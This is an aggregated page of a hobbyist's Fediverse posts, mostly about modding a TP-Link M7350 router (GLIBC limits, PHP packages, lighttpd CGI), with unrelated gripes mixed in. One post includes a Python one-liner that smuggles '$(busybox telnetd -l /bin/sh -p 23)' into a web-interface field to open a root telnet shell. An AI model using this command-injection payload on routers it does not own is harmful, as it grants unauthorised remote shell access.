home.social

#acws — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #acws, aggregated by home.social.

fetched live
  1. This #login was gladly sponsored by the keyboard emulator #webbrowsers seemingly hate

    Yay no need to buy a #keyboard or #mouse use your #rooted android #phone instead.

    (But my webbrowser should chill.
    Thats one scary #red screen :blobcatnotlike: )

    #FDroid
    https://postimg.cc/XXhZZ0r1
    https://i.postimg.cc/xTjL4fnQ/joined-image.jpg

    #repost •acws #acws
  2. #Python:

    Where every project is just 1.000.000 #dependencies non resolving #conflicts and "oh we dunno #WorkedOnMyMachine pl0x "

    And people ask me why I like #PHP and #JS more ...

    yes.

    (I can hear it. the python people coming to town and giving me advice on what I'm doing wrong, why pytorch is awesome and.
    oh no )

    #WeNeedMorePythonDependencyRiots

    #repost •acws #acws

  3. Video inpainting via user-provided reference frame
    Abstract
    Certain aspects involve video inpainting in which content is propagated from a user-provided reference frame to other video frames depicting a scene. For example, a computing system accesses a set of video frames with annotations identifying a target region to be modified. The computing system determines a motion of the target region's boundary across the set of video frames, and also interpolates pixel motion within the target region across the set of video frames. The computing system also inserts, responsive to user input, a reference frame into the set of video frames. The reference frame can include reference color data from a user-specified modification to the target region. The computing system can use the reference color data and the interpolated motion to update color data in the target region across set of video frames.


    Waaait.
    Someone made a #patent on the #idea I'm currently working on

    Are you. kitten me ?
    https://patents.google.com/patent/US10872637B2/en?inventor=Ramiz+Sheikh

    So you can add #patents on ideas and not even have a working #demo ?
    That picture of the #camel I could have drawn !

    :abloblamp:

    #repost •acws #acws
  4. Yes.
    1.) Hook #customers
    2.) Build trust
    2.1) Build #monopoly
    3.) Exploit chained customers and #IllusionOfNoAlternatives

    https://m.youtube.com/watch?v=8hfmvQjVIIQ

    #Microsoft #BillWindow #BillGates

    and any other company ever.
    Its the Same old Story always again.

    The world can be so #boring
    :mastodon_oops:


    #repost •acws #acws
  5. Great.
    Buy a #Minisforum 690 Pro I thought.

    And then. No signal on any #HDMI *

    Bascially
    Just turn on and black screen. I've tried reconfiguring the RAM and the nvme stick, clearing CMOS, unplugging the CMOS battery, reset, holding power for 30 sec, nothing worked.


    Now what do I do :
    https://www.reddit.com/r/MiniPCs/comments/1gc2kqc/minisforum_um690_bios_issue/

    Guess I need to buy a #keyboard after all to try and somehow enter #Bios

    (Thats why I usually hate desktop pcs. They do whatever they want)
    #SadCea

    ------
    * Tried as output device:
    - Genki Shadowcast => Black Screen
    - UGreen Capture card => no signal
    - Huion Kamvas 13 => no signal

    Wat.
    (Strangely enough when I connect my tablet to it via usbc it claims it wants to act as "external monitor"

    I'd be fine if I could install #vnc and access it remotely if it is running at all,
    but setting up a pc without .... seeing anything is kinda difficult

    #repost •acws #acws
  6. Am I btw the only one to #notice most #programming ytchannels slowly turning into #AI advocates ?
    @codinggirl_ @AZisk @Fireship f.e.

    Is this a rule now ?
    Or is it cause people watch #videos with term " #AI " much more ?

    Even #art ppl like @ErgoJosh n @Kooleen had their moments..

    #PlayingTheGame or #BeingPlayedByTheGame

    :blobcatshark:
    #repost •acws #acws
  7. Lets write a lil tool,
    so we don't need to use #telnet anymore

    https://codeberg.org/alceawisteria/DeviceHacking/src/branch/main/routers/TPLink_M7350/proggies/2026-01-10-ShellBrowser

    And now we can use (the previously enabled lighttpd listing extended by an html wrapper and make cgi-bin execute *sh.

    Without any command line. In the #webbrowser .
    ❤️ Lovely
    Whats that ?
    If you copy in a sh onto your router externalSD ?

    ..
    Sure. added a FixPermission button just for that. :abloblamp:

    I like #CgiBin . Is nice

    (I kinda god bamboozled by FileExplorer putting a lock on the files and them not being written by the sh. Seems like WinSCP handles that better. Darn you #Windows #Fileexplorer )

    #repost •acws #acws #m7350 #tplink
  8. Well turns out we can do without #php

    Router hates #https connections, so we need to rewrite the entire uptime thing
    (Furthermore -spider https is always retruning 404, but router is on, so yea.)

    https://codeberg.org/alceawisteria/UptimeMonitor/src/branch/main/sh_ver

    But it works.

    Now I only need to figure out how to do #cron .
    And I'm done.


    Guess I'll be writing some customized *sh for it then.
    That was *not* on my 2026 Bingo card.
    (Note to self, check #GLIBC version on future routers, so you know what it can actually run !)


    #repost •acws #acws #m7350 #tplink
  9. Soooo


    ./opt/bin/php-cgi: /opt/lib/libc.so.6: version `GLIBC_2.25' not found (required by ./opt/bin/php-cgi)
    ./opt/bin/php-cgi: /opt/lib/libc.so.6: version `GLIBC_2.27' not found (required by ./opt/bin/php-cgi)
    /media/card/php/test_cgi #
    /media/card/php/test_cgi # cd ..
    /media/card/php #

    even #PHP 7.2.2 requires #GLIBC 2.25/2.27! That means ALL the Entware PHP packages are compiled against newer glibc than your router has (GLIBC 2.18).

    This seems to a case of "How low can you go" :P
    https://bin.entware.net/armv7sf-k3.2/archive/

    I'm not sure trying to install php is worth it then.
    After all, below 7 means that most of the stuff of mine, including the one I want needs to be rewritten.

    Might aswell use #perl or #shell at that point....

    #m7350 #tplink
    #repost •acws #acws
  10. How very.. #odd
    After a slight #lighhttpd change
    ----------------
    server.modules = (
    / # # Uncomment the CGI assignment line
    / # sed -i 's|^#cgi.assign.*|cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )|' /etc/lighttpd.conf
    / # grep -n "cgi.assign" /etc/lighttpd.conf
    141: cgi.assign = ( "" => "" )
    144: cgi.assign = ( "" => "" )
    248:cgi.assign = ( ".pl" => "/usr/bin/perl", ".cgi" => "/usr/bin/perl" )
    /
    -------------

    and rebooting the #m7350 now #telnet will not renable again with the script.

    Whats even weirder.

    qcmap_web_cgi throws a 404..
    I'm eternally confused

    We still get a token no problemo, but somehow telnet is now closed and stays ?
    (Why would a router reboot or slight lighttpd change cause this ?)

    Should've enabled #adb while I had the chance haha.

    Not eternally sad as I was running into brickwalls left and right with #php7 8 and #python ..
    And even #perl has issues Ohwell




    C:\Users\User>python -c "import requests; r=requests.post('http://192.168.0.1/qcmap_web_cgi', json={'token':'WPL3qTwBJ8YSmbz1','module':'webServer','action':1,'language':'\$(busybox telnetd -l /bin/sh -p 23)'}, headers={'Cookie':'tpweb_token=WPL3qTwBJ8YSmbz1'}); print(r.status_code, r.text)"
    <string>&#58;1&#58; SyntaxWarning&#58; invalid escape sequence '\$'
    404 <?xml version="1.0" encoding="iso-8859-1"?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http&#58;//www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http&#58;//www.w3.org/1999/xhtml" xml&#58;lang="en" lang="en">
    <head>
    <title>404 - Not Found</title>
    </head>
    <body>
    <h1>404 - Not Found</h1>
    </body>
    </html>






    #repost •acws #acws
  11. So you are trying to tell me that noone bothered to archive these #entware files
    1592
    phodav_2.5-1_armv7-3.2.ipk 18-Apr-2021 13:23 28453
    php7-cgi_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 1507945
    php7-cli_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 1527762
    php7-fastcgi_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 786
    php7-fpm_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 1562752
    php7-mod-bcmath_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 12214
    php7-mod-calendar_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 10578
    php7-mod-ctype_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 3104
    php7-mod-curl_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 33116
    php7-mod-dom_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 45322
    php7-mod-exif_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 27343
    php7-mod-fileinfo_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 401782
    php7-mod-filter_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 15741
    php7-mod-ftp_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 17577
    php7-mod-gd_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 26089
    php7-mod-gettext_7.4.16-1_armv7-3.2.ipk 19-Apr-2021 17:23 4391


    and now they are Gone ???

    What is the #IT community even doing anyways ?
    https://web.archive.org/web/20210613113743/https://bin.entware.net/armv7sf-k3.2/

    Now I can't get a 2.2.7 GLIBC to be able to use #php 8


    And I cannot get a #php7 which might just be compatible with my old one as there is no backup on da whole. wide. web

    A
    Ma
    Zing.


    :blobcatnotlike:

    #repost •acws #acws #m7350 #tplink
  12. Looks like #M7350 s GLIBC_2.25 is not compatible with #php 8 hmmmmmm


    #repost •acws #acws
  13. Hmm so thats what the #M7350 looks like on the inside


    :blobaww:

    #repost •acws #acws #tplink